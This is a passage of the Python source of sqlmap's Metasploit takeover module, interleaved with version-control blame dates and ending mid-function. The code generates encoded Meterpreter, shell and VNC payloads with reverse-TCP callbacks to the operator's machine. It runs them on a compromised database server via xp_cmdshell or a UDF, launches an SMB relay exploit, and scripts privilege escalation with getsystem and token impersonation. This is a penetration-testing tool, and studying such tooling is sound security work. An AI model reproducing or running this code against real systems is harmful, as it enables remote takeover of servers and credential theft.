2009-04-22 15:48:07 +04:00
|
|
|
#!/usr/bin/env python
|
|
|
|
|
|
|
|
"""
|
|
|
|
$Id$
|
|
|
|
|
|
|
|
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
|
|
|
|
|
2010-03-03 18:26:27 +03:00
|
|
|
Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
2009-04-22 15:48:07 +04:00
|
|
|
Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
|
|
|
|
|
|
|
|
sqlmap is free software; you can redistribute it and/or modify it under
|
|
|
|
the terms of the GNU General Public License as published by the Free
|
|
|
|
Software Foundation version 2 of the License.
|
|
|
|
|
|
|
|
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
|
|
|
|
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
|
|
|
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
|
|
|
details.
|
|
|
|
|
|
|
|
You should have received a copy of the GNU General Public License along
|
|
|
|
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
|
|
|
|
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
|
|
|
"""
|
|
|
|
|
|
|
|
import os
|
|
|
|
import re
|
|
|
|
import stat
|
|
|
|
import sys
|
|
|
|
import time
|
|
|
|
|
|
|
|
from select import select
|
|
|
|
from subprocess import PIPE
|
|
|
|
from subprocess import Popen as execute
|
|
|
|
|
|
|
|
from lib.core.common import dataToStdout
|
|
|
|
from lib.core.common import getLocalIP
|
|
|
|
from lib.core.common import getRemoteIP
|
2010-01-28 20:07:34 +03:00
|
|
|
from lib.core.common import normalizePath
|
2010-04-23 20:34:20 +04:00
|
|
|
from lib.core.common import ntToPosixSlashes
|
2009-04-22 15:48:07 +04:00
|
|
|
from lib.core.common import pollProcess
|
|
|
|
from lib.core.common import randomRange
|
|
|
|
from lib.core.common import randomStr
|
|
|
|
from lib.core.common import readInput
|
|
|
|
from lib.core.data import conf
|
|
|
|
from lib.core.data import kb
|
|
|
|
from lib.core.data import logger
|
|
|
|
from lib.core.exception import sqlmapDataException
|
|
|
|
from lib.core.exception import sqlmapFilePathException
|
|
|
|
from lib.core.subprocessng import blockingReadFromFD
|
|
|
|
from lib.core.subprocessng import blockingWriteToFD
|
|
|
|
from lib.core.subprocessng import setNonBlocking
|
|
|
|
from lib.request.connect import Connect as Request
|
|
|
|
from lib.takeover.upx import upx
|
|
|
|
|
|
|
|
|
|
|
|
class Metasploit:
|
|
|
|
"""
|
|
|
|
This class defines methods to call Metasploit for plugins.
|
|
|
|
"""
|
|
|
|
|
|
|
|
def __initVars(self):
|
|
|
|
self.connectionStr = None
|
2009-04-24 14:27:52 +04:00
|
|
|
self.lhostStr = None
|
2009-04-22 15:48:07 +04:00
|
|
|
self.rhostStr = None
|
|
|
|
self.portStr = None
|
|
|
|
self.payloadStr = None
|
|
|
|
self.encoderStr = None
|
2009-09-26 03:03:45 +04:00
|
|
|
self.payloadConnStr = None
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
self.resourceFile = None
|
|
|
|
|
|
|
|
self.localIP = getLocalIP()
|
|
|
|
self.remoteIP = getRemoteIP()
|
|
|
|
|
2010-02-04 17:50:54 +03:00
|
|
|
self.__msfCli = normalizePath(os.path.join(conf.msfPath, "msfcli"))
|
|
|
|
self.__msfConsole = normalizePath(os.path.join(conf.msfPath, "msfconsole"))
|
|
|
|
self.__msfEncode = normalizePath(os.path.join(conf.msfPath, "msfencode"))
|
|
|
|
self.__msfPayload = normalizePath(os.path.join(conf.msfPath, "msfpayload"))
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
self.__msfPayloadsList = {
|
|
|
|
"windows": {
|
2009-11-16 19:39:31 +03:00
|
|
|
1: ( "Meterpreter (default)", "windows/meterpreter" ),
|
2009-12-18 01:04:01 +03:00
|
|
|
2: ( "Shell", "windows/shell" ),
|
|
|
|
3: ( "VNC", "windows/vncinject" ),
|
2009-04-22 15:48:07 +04:00
|
|
|
},
|
|
|
|
"linux": {
|
|
|
|
1: ( "Shell", "linux/x86/shell" ),
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
self.__msfConnectionsList = {
|
|
|
|
"windows": {
|
2009-11-16 19:39:31 +03:00
|
|
|
1: ( "Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp" ),
|
|
|
|
2: ( "Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535", "reverse_tcp_allports" ),
|
|
|
|
3: ( "Bind TCP: Listen on the database host for a connection", "bind_tcp" ),
|
2009-04-22 15:48:07 +04:00
|
|
|
},
|
|
|
|
"linux": {
|
2009-11-16 19:39:31 +03:00
|
|
|
1: ( "Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp" ),
|
|
|
|
2: ( "Bind TCP: Listen on the database host for a connection", "bind_tcp" ),
|
2009-04-22 15:48:07 +04:00
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
self.__msfEncodersList = {
|
|
|
|
"windows": {
|
|
|
|
1: ( "No Encoder", "generic/none" ),
|
|
|
|
2: ( "Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed" ),
|
|
|
|
3: ( "Alpha2 Alphanumeric Uppercase Encoder", "x86/alpha_upper" ),
|
|
|
|
4: ( "Avoid UTF8/tolower", "x86/avoid_utf8_tolower" ),
|
|
|
|
5: ( "Call+4 Dword XOR Encoder", "x86/call4_dword_xor" ),
|
|
|
|
6: ( "Single-byte XOR Countdown Encoder", "x86/countdown" ),
|
|
|
|
7: ( "Variable-length Fnstenv/mov Dword XOR Encoder", "x86/fnstenv_mov" ),
|
|
|
|
8: ( "Polymorphic Jump/Call XOR Additive Feedback Encoder", "x86/jmp_call_additive" ),
|
|
|
|
9: ( "Non-Alpha Encoder", "x86/nonalpha" ),
|
|
|
|
10: ( "Non-Upper Encoder", "x86/nonupper" ),
|
|
|
|
11: ( "Polymorphic XOR Additive Feedback Encoder (default)", "x86/shikata_ga_nai" ),
|
|
|
|
12: ( "Alpha2 Alphanumeric Unicode Mixedcase Encoder", "x86/unicode_mixed" ),
|
|
|
|
13: ( "Alpha2 Alphanumeric Unicode Uppercase Encoder", "x86/unicode_upper" ),
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
self.__msfSMBPortsList = {
|
|
|
|
"windows": {
|
|
|
|
1: ( "139/TCP (default)", "139" ),
|
|
|
|
2: ( "445/TCP", "445" ),
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
self.__portData = {
|
2009-09-26 03:03:45 +04:00
|
|
|
"bind": "remote port number",
|
|
|
|
"reverse": "local port number",
|
2009-04-22 15:48:07 +04:00
|
|
|
}
|
|
|
|
|
|
|
|
def __skeletonSelection(self, msg, lst=None, maxValue=1, default=1):
|
|
|
|
if kb.os == "Windows":
|
2009-04-28 03:05:11 +04:00
|
|
|
opSys = "windows"
|
2009-04-22 15:48:07 +04:00
|
|
|
else:
|
2009-04-28 03:05:11 +04:00
|
|
|
opSys = "linux"
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
message = "which %s do you want to use?" % msg
|
|
|
|
|
|
|
|
if lst:
|
2009-04-28 03:05:11 +04:00
|
|
|
for num, data in lst[opSys].items():
|
2009-04-22 15:48:07 +04:00
|
|
|
description = data[0]
|
|
|
|
|
|
|
|
if num > maxValue:
|
|
|
|
maxValue = num
|
|
|
|
|
2009-07-06 18:40:33 +04:00
|
|
|
if "(default)" in description:
|
2009-04-22 15:48:07 +04:00
|
|
|
default = num
|
|
|
|
|
|
|
|
message += "\n[%d] %s" % (num, description)
|
|
|
|
else:
|
|
|
|
message += " [%d] " % default
|
|
|
|
|
|
|
|
choice = readInput(message, default="%d" % default)
|
|
|
|
|
|
|
|
if not choice:
|
|
|
|
if lst:
|
2010-05-28 17:05:02 +04:00
|
|
|
choice = unicode(default)
|
2009-04-22 15:48:07 +04:00
|
|
|
else:
|
|
|
|
return default
|
|
|
|
|
|
|
|
elif not choice.isdigit():
|
|
|
|
logger.warn("invalid value, only digits are allowed")
|
|
|
|
return self.__skeletonSelection(msg, lst, maxValue, default)
|
|
|
|
|
|
|
|
elif int(choice) > maxValue or int(choice) < 1:
|
|
|
|
logger.warn("invalid value, it must be a digit between 1 and %d" % maxValue)
|
|
|
|
return self.__skeletonSelection(msg, lst, maxValue, default)
|
|
|
|
|
|
|
|
choice = int(choice)
|
|
|
|
|
|
|
|
if lst:
|
2009-04-28 03:05:11 +04:00
|
|
|
choice = lst[opSys][choice][1]
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
return choice
|
|
|
|
|
|
|
|
def __selectSMBPort(self):
|
|
|
|
return self.__skeletonSelection("SMB port", self.__msfSMBPortsList)
|
|
|
|
|
|
|
|
def __selectEncoder(self, encode=True):
|
2010-05-25 14:09:35 +04:00
|
|
|
if isinstance(encode, basestring):
|
2009-09-26 03:03:45 +04:00
|
|
|
return encode
|
|
|
|
|
2010-01-02 05:02:12 +03:00
|
|
|
elif kb.os == "Windows" and encode:
|
2009-04-22 15:48:07 +04:00
|
|
|
return self.__skeletonSelection("payload encoding", self.__msfEncodersList)
|
|
|
|
|
2010-03-13 01:43:35 +03:00
|
|
|
def __selectPayload(self):
|
2010-01-02 05:02:12 +03:00
|
|
|
if kb.os == "Windows" and conf.privEsc:
|
2009-04-22 15:48:07 +04:00
|
|
|
infoMsg = "forcing Metasploit payload to Meterpreter because "
|
2010-01-26 04:14:44 +03:00
|
|
|
infoMsg += "it is the only payload that can be used to "
|
|
|
|
infoMsg += "escalate privileges, either via 'incognito' "
|
2010-01-30 01:58:12 +03:00
|
|
|
infoMsg += "extension or via 'getsystem' command"
|
2009-04-22 15:48:07 +04:00
|
|
|
logger.info(infoMsg)
|
|
|
|
|
2009-07-06 18:40:33 +04:00
|
|
|
__payloadStr = "windows/meterpreter"
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
else:
|
|
|
|
__payloadStr = self.__skeletonSelection("payload", self.__msfPayloadsList)
|
|
|
|
|
|
|
|
if __payloadStr == "windows/vncinject":
|
|
|
|
choose = False
|
|
|
|
|
|
|
|
if kb.dbms == "MySQL":
|
|
|
|
debugMsg = "by default MySQL on Windows runs as SYSTEM "
|
|
|
|
debugMsg += "user, it is likely that the the VNC "
|
|
|
|
debugMsg += "injection will be successful"
|
|
|
|
logger.debug(debugMsg)
|
|
|
|
|
|
|
|
elif kb.dbms == "PostgreSQL":
|
|
|
|
choose = True
|
|
|
|
|
|
|
|
warnMsg = "by default PostgreSQL on Windows runs as "
|
|
|
|
warnMsg += "postgres user, it is unlikely that the VNC "
|
|
|
|
warnMsg += "injection will be successful"
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion[0] in ( "2005", "2008" ):
|
|
|
|
choose = True
|
|
|
|
|
|
|
|
warnMsg = "it is unlikely that the VNC injection will be "
|
2009-12-03 01:52:17 +03:00
|
|
|
warnMsg += "successful because usually Microsoft SQL Server "
|
2009-04-22 15:48:07 +04:00
|
|
|
warnMsg += "%s runs as Network Service " % kb.dbmsVersion[0]
|
|
|
|
warnMsg += "or the Administrator is not logged in"
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
2010-01-02 05:02:12 +03:00
|
|
|
if choose:
|
2009-04-22 15:48:07 +04:00
|
|
|
message = "what do you want to do?\n"
|
|
|
|
message += "[1] Give it a try anyway\n"
|
2009-12-03 01:52:17 +03:00
|
|
|
message += "[2] Fall back to Meterpreter payload (default)\n"
|
2009-04-22 15:48:07 +04:00
|
|
|
message += "[3] Fall back to Shell payload"
|
|
|
|
|
|
|
|
while True:
|
|
|
|
choice = readInput(message, default="2")
|
|
|
|
|
|
|
|
if not choice or choice == "2":
|
2009-07-06 18:40:33 +04:00
|
|
|
__payloadStr = "windows/meterpreter"
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
break
|
|
|
|
|
|
|
|
elif choice == "3":
|
|
|
|
__payloadStr = "windows/shell"
|
|
|
|
|
|
|
|
break
|
|
|
|
|
|
|
|
elif choice == "1":
|
|
|
|
if kb.dbms == "PostgreSQL":
|
|
|
|
logger.warn("beware that the VNC injection might not work")
|
|
|
|
|
|
|
|
break
|
|
|
|
|
|
|
|
elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion[0] in ( "2005", "2008" ):
|
|
|
|
break
|
|
|
|
|
|
|
|
elif not choice.isdigit():
|
|
|
|
logger.warn("invalid value, only digits are allowed")
|
|
|
|
|
|
|
|
elif int(choice) < 1 or int(choice) > 2:
|
|
|
|
logger.warn("invalid value, it must be 1 or 2")
|
|
|
|
|
|
|
|
return __payloadStr
|
|
|
|
|
|
|
|
def __selectPort(self):
|
|
|
|
for connType, connStr in self.__portData.items():
|
|
|
|
if self.connectionStr.startswith(connType):
|
|
|
|
return self.__skeletonSelection(connStr, maxValue=65535, default=randomRange(1025, 65535))
|
|
|
|
|
|
|
|
def __selectRhost(self):
|
|
|
|
if self.connectionStr.startswith("bind"):
|
|
|
|
message = "which is the back-end DBMS address? [%s] " % self.remoteIP
|
|
|
|
address = readInput(message, default=self.remoteIP)
|
|
|
|
|
|
|
|
if not address:
|
|
|
|
address = self.remoteIP
|
|
|
|
|
|
|
|
return address
|
|
|
|
|
|
|
|
elif self.connectionStr.startswith("reverse"):
|
|
|
|
return None
|
|
|
|
|
|
|
|
else:
|
|
|
|
raise sqlmapDataException, "unexpected connection type"
|
|
|
|
|
2009-04-24 14:27:52 +04:00
|
|
|
def __selectLhost(self):
|
2010-01-02 05:02:12 +03:00
|
|
|
if self.connectionStr.startswith("reverse") or self.resourceFile is not None:
|
2009-04-24 14:27:52 +04:00
|
|
|
message = "which is the local address? [%s] " % self.localIP
|
|
|
|
address = readInput(message, default=self.localIP)
|
|
|
|
|
|
|
|
if not address:
|
|
|
|
address = self.localIP
|
|
|
|
|
|
|
|
return address
|
|
|
|
|
|
|
|
elif self.connectionStr.startswith("bind"):
|
|
|
|
return None
|
|
|
|
|
|
|
|
else:
|
|
|
|
raise sqlmapDataException, "unexpected connection type"
|
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
def __selectConnection(self):
|
|
|
|
return self.__skeletonSelection("connection type", self.__msfConnectionsList)
|
|
|
|
|
2010-03-13 01:43:35 +03:00
|
|
|
def __prepareIngredients(self, encode=True):
|
2009-04-22 15:48:07 +04:00
|
|
|
self.connectionStr = self.__selectConnection()
|
2009-04-24 14:27:52 +04:00
|
|
|
self.lhostStr = self.__selectLhost()
|
2009-04-22 15:48:07 +04:00
|
|
|
self.rhostStr = self.__selectRhost()
|
|
|
|
self.portStr = self.__selectPort()
|
2010-03-13 01:43:35 +03:00
|
|
|
self.payloadStr = self.__selectPayload()
|
2009-04-22 15:48:07 +04:00
|
|
|
self.encoderStr = self.__selectEncoder(encode)
|
|
|
|
|
2009-09-26 03:03:45 +04:00
|
|
|
if self.payloadStr == "linux/x86/shell":
|
|
|
|
self.payloadConnStr = "%s_%s" % (self.payloadStr, self.connectionStr)
|
|
|
|
else:
|
|
|
|
self.payloadConnStr = "%s/%s" % (self.payloadStr, self.connectionStr)
|
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
def __forgeMsfCliCmd(self, exitfunc="process"):
|
2009-09-26 03:03:45 +04:00
|
|
|
self.__cliCmd = "%s multi/handler PAYLOAD=%s" % (self.__msfCli, self.payloadConnStr)
|
2009-04-22 15:48:07 +04:00
|
|
|
self.__cliCmd += " EXITFUNC=%s" % exitfunc
|
|
|
|
self.__cliCmd += " LPORT=%s" % self.portStr
|
|
|
|
|
|
|
|
if self.payloadStr == "windows/vncinject":
|
|
|
|
self.__cliCmd += " DisableCourtesyShell=1"
|
|
|
|
|
|
|
|
if self.connectionStr.startswith("bind"):
|
|
|
|
self.__cliCmd += " RHOST=%s" % self.rhostStr
|
|
|
|
|
|
|
|
elif self.connectionStr.startswith("reverse"):
|
2009-04-24 14:27:52 +04:00
|
|
|
self.__cliCmd += " LHOST=%s" % self.lhostStr
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
else:
|
|
|
|
raise sqlmapDataException, "unexpected connection type"
|
|
|
|
|
|
|
|
self.__cliCmd += " E"
|
|
|
|
|
|
|
|
def __forgeMsfConsoleCmd(self):
|
|
|
|
self.__consoleCmd = "%s -r %s" % (self.__msfConsole, self.resourceFile)
|
|
|
|
|
|
|
|
def __forgeMsfConsoleResource(self):
|
2009-12-18 01:04:01 +03:00
|
|
|
self.resourceFile = os.path.join(conf.outputPath, self.__randFile)
|
2009-05-11 19:37:48 +04:00
|
|
|
|
2010-03-13 01:43:35 +03:00
|
|
|
self.__prepareIngredients(encode=False)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
self.__resource = "use windows/smb/smb_relay\n"
|
2009-04-24 14:27:52 +04:00
|
|
|
self.__resource += "set SRVHOST %s\n" % self.lhostStr
|
2009-04-22 15:48:07 +04:00
|
|
|
self.__resource += "set SRVPORT %s\n" % self.__selectSMBPort()
|
2009-09-26 03:03:45 +04:00
|
|
|
self.__resource += "set PAYLOAD %s\n" % self.payloadConnStr
|
2009-04-22 15:48:07 +04:00
|
|
|
self.__resource += "set LPORT %s\n" % self.portStr
|
|
|
|
|
|
|
|
if self.connectionStr.startswith("bind"):
|
|
|
|
self.__resource += "set RHOST %s\n" % self.rhostStr
|
|
|
|
|
|
|
|
elif self.connectionStr.startswith("reverse"):
|
2009-04-24 14:27:52 +04:00
|
|
|
self.__resource += "set LHOST %s\n" % self.lhostStr
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
else:
|
|
|
|
raise sqlmapDataException, "unexpected connection type"
|
|
|
|
|
|
|
|
self.__resource += "exploit\n"
|
|
|
|
|
2009-05-11 19:37:48 +04:00
|
|
|
self.resourceFp = open(self.resourceFile, "w")
|
2009-04-22 15:48:07 +04:00
|
|
|
self.resourceFp.write(self.__resource)
|
|
|
|
self.resourceFp.close()
|
|
|
|
|
2009-05-11 19:37:48 +04:00
|
|
|
def __forgeMsfPayloadCmd(self, exitfunc, format, outFile, extra=None):
|
2009-09-26 03:03:45 +04:00
|
|
|
self.__payloadCmd = "%s %s" % (self.__msfPayload, self.payloadConnStr)
|
2009-04-22 15:48:07 +04:00
|
|
|
self.__payloadCmd += " EXITFUNC=%s" % exitfunc
|
|
|
|
self.__payloadCmd += " LPORT=%s" % self.portStr
|
|
|
|
|
|
|
|
if self.connectionStr.startswith("reverse"):
|
2009-04-24 14:27:52 +04:00
|
|
|
self.__payloadCmd += " LHOST=%s" % self.lhostStr
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
elif not self.connectionStr.startswith("bind"):
|
|
|
|
raise sqlmapDataException, "unexpected connection type"
|
|
|
|
|
2009-09-26 03:03:45 +04:00
|
|
|
if kb.os == "Windows" or extra == "BufferRegister=EAX":
|
2009-05-11 19:37:48 +04:00
|
|
|
self.__payloadCmd += " R | %s -a x86 -e %s -o %s -t %s" % (self.__msfEncode, self.encoderStr, outFile, format)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
if extra is not None:
|
|
|
|
self.__payloadCmd += " %s" % extra
|
|
|
|
else:
|
2009-05-11 19:37:48 +04:00
|
|
|
self.__payloadCmd += " X > %s" % outFile
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2009-05-11 19:37:48 +04:00
|
|
|
def __runMsfCli(self, exitfunc):
|
2009-04-22 15:48:07 +04:00
|
|
|
self.__forgeMsfCliCmd(exitfunc)
|
|
|
|
|
|
|
|
infoMsg = "running Metasploit Framework 3 command line "
|
|
|
|
infoMsg += "interface locally, wait.."
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
logger.debug("executing local command: %s" % self.__cliCmd)
|
|
|
|
self.__msfCliProc = execute(self.__cliCmd, shell=True, stdin=PIPE, stdout=PIPE)
|
|
|
|
|
|
|
|
def __runMsfConsole(self):
|
|
|
|
infoMsg = "running Metasploit Framework 3 console locally, wait.."
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
logger.debug("executing local command: %s" % self.__consoleCmd)
|
|
|
|
self.__msfConsoleProc = execute(self.__consoleCmd, shell=True, stdin=PIPE, stdout=PIPE)
|
|
|
|
|
2009-09-26 03:03:45 +04:00
|
|
|
def __runMsfShellcodeRemote(self):
|
|
|
|
infoMsg = "running Metasploit Framework 3 shellcode "
|
|
|
|
infoMsg += "remotely via UDF 'sys_bineval', wait.."
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
self.udfExecCmd("'%s'" % self.shellcodeString, silent=True, udfName="sys_bineval")
|
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
def __runMsfPayloadRemote(self):
|
|
|
|
infoMsg = "running Metasploit Framework 3 payload stager "
|
|
|
|
infoMsg += "remotely, wait.."
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
if kb.os != "Windows":
|
|
|
|
self.execCmd("chmod +x %s" % self.exeFilePathRemote, silent=True)
|
|
|
|
|
|
|
|
cmd = "%s &" % self.exeFilePathRemote
|
|
|
|
|
2010-03-31 17:52:51 +04:00
|
|
|
if kb.dbms == "Microsoft SQL Server" and (kb.stackedTest or conf.direct):
|
2009-04-22 15:48:07 +04:00
|
|
|
cmd = self.xpCmdshellForgeCmd(cmd)
|
|
|
|
|
|
|
|
self.execCmd(cmd, silent=True)
|
|
|
|
|
|
|
|
def __loadMetExtensions(self, proc, metSess):
|
|
|
|
if kb.os != "Windows":
|
|
|
|
return
|
|
|
|
|
2009-09-26 03:03:45 +04:00
|
|
|
if self.resourceFile is not None:
|
2009-04-22 15:48:07 +04:00
|
|
|
proc.stdin.write("sessions -l\n")
|
|
|
|
proc.stdin.write("sessions -i %s\n" % metSess)
|
|
|
|
|
2009-09-26 03:03:45 +04:00
|
|
|
proc.stdin.write("use espia\n")
|
|
|
|
proc.stdin.write("use incognito\n")
|
2009-04-22 15:48:07 +04:00
|
|
|
proc.stdin.write("use priv\n")
|
2009-09-26 03:03:45 +04:00
|
|
|
proc.stdin.write("use sniffer\n")
|
2010-01-29 05:27:50 +03:00
|
|
|
proc.stdin.write("sysinfo\n")
|
2010-01-29 17:57:33 +03:00
|
|
|
proc.stdin.write("getuid\n")
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2010-01-02 05:02:12 +03:00
|
|
|
if conf.privEsc:
|
2009-04-22 15:48:07 +04:00
|
|
|
print
|
|
|
|
|
2010-01-29 22:32:02 +03:00
|
|
|
infoMsg = "trying to escalate privileges using Meterpreter "
|
2010-01-29 17:57:33 +03:00
|
|
|
infoMsg += "'getsystem' command which tries different "
|
|
|
|
infoMsg += "techniques, including kitrap0d"
|
2010-01-29 05:27:50 +03:00
|
|
|
logger.info(infoMsg)
|
|
|
|
|
2010-01-29 17:57:33 +03:00
|
|
|
proc.stdin.write("getsystem\n")
|
2010-01-29 05:27:50 +03:00
|
|
|
|
2009-09-26 03:03:45 +04:00
|
|
|
infoMsg = "displaying the list of Access Tokens availables. "
|
2009-04-22 15:48:07 +04:00
|
|
|
infoMsg += "Choose which user you want to impersonate by "
|
2010-01-29 17:57:33 +03:00
|
|
|
infoMsg += "using incognito's command 'impersonate_token' if "
|
2010-03-13 01:43:35 +03:00
|
|
|
infoMsg += "'getsystem' does not success to elevate privileges"
|
2009-04-22 15:48:07 +04:00
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
proc.stdin.write("list_tokens -u\n")
|
2010-01-29 05:27:50 +03:00
|
|
|
proc.stdin.write("getuid\n")
|
2010-01-26 04:14:44 +03:00
|
|
|
|
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
def __controlMsfCmd(self, proc, func):
|
|
|
|
stdin_fd = sys.stdin.fileno()
|
|
|
|
setNonBlocking(stdin_fd)
|
|
|
|
|
|
|
|
proc_out_fd = proc.stdout.fileno()
|
|
|
|
setNonBlocking(proc_out_fd)
|
|
|
|
|
|
|
|
while True:
|
|
|
|
returncode = proc.poll()
|
|
|
|
|
|
|
|
if returncode is None:
|
|
|
|
# Child hasn't exited yet
|
|
|
|
pass
|
|
|
|
else:
|
|
|
|
logger.debug("connection closed properly")
|
|
|
|
return returncode
|
|
|
|
|
|
|
|
try:
|
|
|
|
ready_fds = select([stdin_fd, proc_out_fd], [], [], 1)
|
|
|
|
|
|
|
|
if stdin_fd in ready_fds[0]:
|
|
|
|
try:
|
|
|
|
proc.stdin.write(blockingReadFromFD(stdin_fd))
|
|
|
|
except IOError:
|
|
|
|
# Probably the child has exited
|
|
|
|
pass
|
|
|
|
|
|
|
|
if proc_out_fd in ready_fds[0]:
|
|
|
|
out = blockingReadFromFD(proc_out_fd)
|
|
|
|
blockingWriteToFD(sys.stdout.fileno(), out)
|
|
|
|
|
|
|
|
# For --os-pwn and --os-bof
|
|
|
|
pwnBofCond = self.connectionStr.startswith("reverse")
|
|
|
|
pwnBofCond &= "Starting the payload handler" in out
|
|
|
|
|
|
|
|
# For --os-smbrelay
|
|
|
|
smbRelayCond = "Server started" in out
|
|
|
|
|
|
|
|
if pwnBofCond or smbRelayCond:
|
|
|
|
func()
|
|
|
|
|
2009-09-26 03:03:45 +04:00
|
|
|
if "Starting the payload handler" in out and "shell" in self.payloadStr:
|
|
|
|
if kb.os == "Windows":
|
|
|
|
proc.stdin.write("whoami\n")
|
|
|
|
else:
|
|
|
|
proc.stdin.write("uname -a ; id\n")
|
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
metSess = re.search("Meterpreter session ([\d]+) opened", out)
|
|
|
|
|
2009-05-11 19:37:48 +04:00
|
|
|
if metSess:
|
2009-04-22 15:48:07 +04:00
|
|
|
self.__loadMetExtensions(proc, metSess.group(1))
|
|
|
|
|
|
|
|
except EOFError:
|
|
|
|
returncode = proc.wait()
|
|
|
|
|
|
|
|
return returncode
|
|
|
|
|
2009-09-26 03:03:45 +04:00
|
|
|
def createMsfShellcode(self, exitfunc, format, extra, encode):
|
|
|
|
infoMsg = "creating Metasploit Framework 3 multi-stage shellcode "
|
2009-04-22 15:48:07 +04:00
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
self.__randStr = randomStr(lowercase=True)
|
2010-02-26 16:13:50 +03:00
|
|
|
self.__shellcodeFilePath = os.path.join(conf.outputPath, "tmpm%s" % self.__randStr)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
self.__initVars()
|
2010-03-13 01:43:35 +03:00
|
|
|
self.__prepareIngredients(encode=encode)
|
2009-09-26 03:03:45 +04:00
|
|
|
self.__forgeMsfPayloadCmd(exitfunc, format, self.__shellcodeFilePath, extra)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
logger.debug("executing local command: %s" % self.__payloadCmd)
|
2009-05-11 19:37:48 +04:00
|
|
|
process = execute(self.__payloadCmd, shell=True, stdout=None, stderr=PIPE)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
dataToStdout("\r[%s] [INFO] creation in progress " % time.strftime("%X"))
|
|
|
|
pollProcess(process)
|
|
|
|
payloadStderr = process.communicate()[1]
|
|
|
|
|
2009-09-26 03:03:45 +04:00
|
|
|
if kb.os == "Windows" or extra == "BufferRegister=EAX":
|
2009-04-22 15:48:07 +04:00
|
|
|
payloadSize = re.search("size ([\d]+)", payloadStderr, re.I)
|
|
|
|
else:
|
|
|
|
payloadSize = re.search("Length\:\s([\d]+)", payloadStderr, re.I)
|
|
|
|
|
|
|
|
if payloadSize:
|
2009-09-26 03:03:45 +04:00
|
|
|
payloadSize = int(payloadSize.group(1))
|
|
|
|
|
|
|
|
if extra == "BufferRegister=EAX":
|
|
|
|
payloadSize = payloadSize / 2
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2009-09-26 03:03:45 +04:00
|
|
|
debugMsg = "the shellcode size is %d bytes" % payloadSize
|
2009-04-22 15:48:07 +04:00
|
|
|
logger.debug(debugMsg)
|
|
|
|
else:
|
2009-09-26 03:03:45 +04:00
|
|
|
errMsg = "failed to create the shellcode (%s)" % payloadStderr.replace("\n", "")
|
2009-04-24 00:39:32 +04:00
|
|
|
raise sqlmapFilePathException, errMsg
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2009-12-03 01:52:17 +03:00
|
|
|
self.__shellcodeFP = open(self.__shellcodeFilePath, "rb")
|
|
|
|
self.shellcodeString = self.__shellcodeFP.read()
|
2009-05-11 19:37:48 +04:00
|
|
|
self.__shellcodeFP.close()
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
os.unlink(self.__shellcodeFilePath)
|
|
|
|
|
|
|
|
def createMsfPayloadStager(self, initialize=True):
|
2010-01-02 05:02:12 +03:00
|
|
|
if initialize:
|
2009-04-22 15:48:07 +04:00
|
|
|
infoMsg = ""
|
|
|
|
else:
|
|
|
|
infoMsg = "re"
|
|
|
|
|
|
|
|
infoMsg += "creating Metasploit Framework 3 payload stager"
|
|
|
|
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
self.__randStr = randomStr(lowercase=True)
|
|
|
|
|
|
|
|
if kb.os == "Windows":
|
2010-02-26 16:13:50 +03:00
|
|
|
self.exeFilePathLocal = os.path.join(conf.outputPath, "tmpm%s.exe" % self.__randStr)
|
2009-12-18 01:04:01 +03:00
|
|
|
|
|
|
|
# Metasploit developers added support for the old exe format
|
|
|
|
# to msfencode using '-t exe-small' (>= 3.3.3-dev),
|
|
|
|
# http://www.metasploit.com/redmine/projects/framework/repository/revisions/7840
|
|
|
|
